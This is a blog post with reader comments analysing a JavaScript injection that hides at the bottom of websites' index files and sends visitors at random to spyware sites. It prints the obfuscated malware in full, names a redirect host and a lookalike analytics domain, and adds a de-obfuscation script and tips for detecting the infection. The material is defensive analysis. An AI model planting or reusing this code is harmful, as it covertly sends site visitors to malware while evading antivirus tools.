Posted by & filed under Internet Information Server, Windows / Server.

Below is the JavaScript code of an “injection” that inserts itself into the index file of a website. It is designed to go undetected by redirecting only seldom and at random. It is placed at the bottom of the source code, after a large gap of whitespace following the end of the regular source (115 lines in all cases). In most of the cases I have come across, it redirects to a “spyware” or “virus” site. It also goes undetected by antivirus programs (Trend Micro, Panda, Avast). It works with Mozilla (2.0.0.11) and IE7 (I haven’t tested it in others). I’ll look into it further once I decode the script itself.

One of the sites it redirects to is: http://e.pepato.org/e/adsr.php?t=0

It infects each individual .php file and does not re-infect after the initial infection. I have created new sites and cleaned infected .php files, and it has disappeared completely. It injects this code into .php (and .html) files about 115 lines below the last line. It ONLY infects index.php/html files in the root directory of the website; if you name your file index2.php, it will not be infected. The “modified date” time stamps DO change with the infection: there was a spread of 1 minute across hundreds of .php files. If you need a quick way to search all index.php/html files on a server, download Notepad++ and use its “search in directory” feature for certain strings of text. Alternatively, once you find the time stamp of the infection, search for files modified at that time.

var mf=" shapgvba ejtf(c){ine ro,con=\"HcvfNU)z\\\"n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y7C:.XMq!xtSj;k{3u\",olq=\"\",i,nnu,l=\"\",n;sbe(ro=0;ro<c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}",rmhc="";
for(gvg=0;gvg<mf.length;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd>64 && fbd<78)||(fbd>96 && fbd<110)) fbd=fbd+13;else if((fbd>77 && fbd<91)||(fbd>109 && fbd<123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));}
var km,ff; eval( rmhc );
km="<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T\"G]$K;Ms$G'Ua<SeRJ:1U7#]FT#FGl\\an#B#S~Msi$\\aUSRel\\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T\"G]$KMG=GMMGMza\\a><\\/SeRJ:1>aUmxU</A~Msi$>U"; rwgs(km);
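The script above is two layers deep: the `mf` string is a ROT13-wrapped decoder function that `eval` brings to life, and `km` is the real payload, encoded with the 81-character substitution alphabet inside that function. The following static de-obfuscator (an added example, not code from the post or from the malware) peels both layers without `eval()` or `document.write()`, so the HTML the injection would emit can be read and searched for in other index files. It assumes the alphabet ends with a trailing space that the blog's HTML dropped: the decoder does `% 81` but the page shows only 80 characters, and a trailing space is the one value that makes the payload decode to `<script language=...`.

```javascript
// Added example, not from the original post: a static de-obfuscator for the injection
// above. It reverses the ROT13 wrapper and then the custom substitution alphabet without
// eval() or document.write(). Assumption: the alphabet is 81 characters and ends with a
// space (the decoder uses "% 81", the page shows 80 characters, and a trailing space is
// the one value that makes the output start with "<script language=").

// Layer 1: ROT13 over the decoder's own source (the "mf" string). Only letters move.
function rot13(s) {
  return s.replace(/[A-Za-z]/g, ch => {
    const base = ch <= 'Z' ? 65 : 97;
    return String.fromCharCode((ch.charCodeAt(0) - base + 13) % 26 + base);
  });
}

// "mf" and "km" copied from the injected code, with HTML entities decoded and the
// assumed trailing space added after "3u" in the alphabet.
const MF = ' shapgvba ejtf(c){ine ro,con="HcvfNU)z\\"n#hG1*PrTR[4`5(\'082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y7C:.XMq!xtSj;k{3u ",olq="",i,nnu,l="",n;sbe(ro=0;ro<c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}';
const KM = '<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T"G]$K;Ms$G\'Ua<SeRJ:1U7#]FT#FGl\\an#B#S~Msi$\\aUSRel\\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T"G]$KMG=GMMGMza\\a><\\/SeRJ:1>aUmxU</A~Msi$>U';

// Recover the decoder's readable source text without executing it.
function recoverDecoderSource() {
  return rot13(MF).trim();
}

// Layer 2: take the substitution alphabet from the first double-quoted literal in the
// recovered source, un-escaping the \" it contains.
function extractAlphabet(decoderSrc) {
  const m = /="((?:\\"|[^"])*)"/.exec(decoderSrc);
  if (!m) throw new Error('alphabet literal not found');
  return m[1].replace(/\\"/g, '"');
}

// The decoder's ((i+1)%81-1) arithmetic maps each payload character to the one before
// it in the alphabet, wrapping index 0 to the last slot; other characters pass through.
function substitutionDecode(payload, alphabet) {
  let out = '';
  for (const ch of payload) {
    const i = alphabet.indexOf(ch);
    out += i < 0 ? ch : alphabet[(i + alphabet.length - 1) % alphabet.length];
  }
  return out;
}

function decodeInjection() {
  return substitutionDecode(KM, extractAlphabet(recoverDecoderSource()));
}

console.log(decodeInjection());
```

The printed result is the outer `<script language="javascript">` wrapper whose `document.write(...)` emits a remote `<SCRIPT SRC="http://...">` tag with `document.referrer` appended to the URL, which is what makes the redirect depend on where the visitor came from.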

Looks like a newer one; I’ve heard reports of similar activity as far back as mid-January.


6 Responses to “Javascript Spyware Redirect for IIS 6 (malware)”

  1. Thomas Johnson

    Do you know how this injection occurred? It happened to my websites and I’m not sure how this code was added to the index files.

  2. Chris Stinson

    I have not traced it back to the injection just yet. I’ll be starting off by looking at the log files of IIS and the Event viewer at the time of injection.

    What other applications did you have on your server? How many websites in IIS? Do you browse the Internet with IE 6 or IE 7 on that server? Do you have any ports open for other applications (like Exchange)? Is your server using Windows Firewall?

  3. Thomas Johnson

    Someone decoded this script – I’m not sure if it’s accurate – but this is what they got:

    document.write( "" );

    http://www.google-analytlcs.com/__utt.js?

    document.writeln("");

    About your questions – I’m unsure about the server config – I will have to ask the hosting company, which is looking into it on their end (I will post what they find here for you) – I was just alarmed that this code was added to my index.htm/html/php without my knowledge.
    I’m using IE 7 to browse.
    Server running:
    Operating system Linux
    Kernel version 2.6.24.3-grsec
    Machine Type i686
    Apache version 1.3.37 (Unix)
    PERL version 5.8.8
    PHP version 4.4.4
    MySQL version 4.1.22-standard
    cPanel Build 11.18.3-STABLE 21703

  4. Chris Stinson

    Yeah, it was an IFRAME injection done by the RBN (Russian Business Network).

    Your server configuration is different enough from the others that have been attacked. It looks to be an input validation injection. Possibly an upcoming bug in MySQL or PHP.

    I’ll have more time after I’m done with my ‘work’ for the day.

  5. gv

    I googled but did not find how this insertion occurred. It happened to my websites and I’m not sure which malware added this code to the index files.
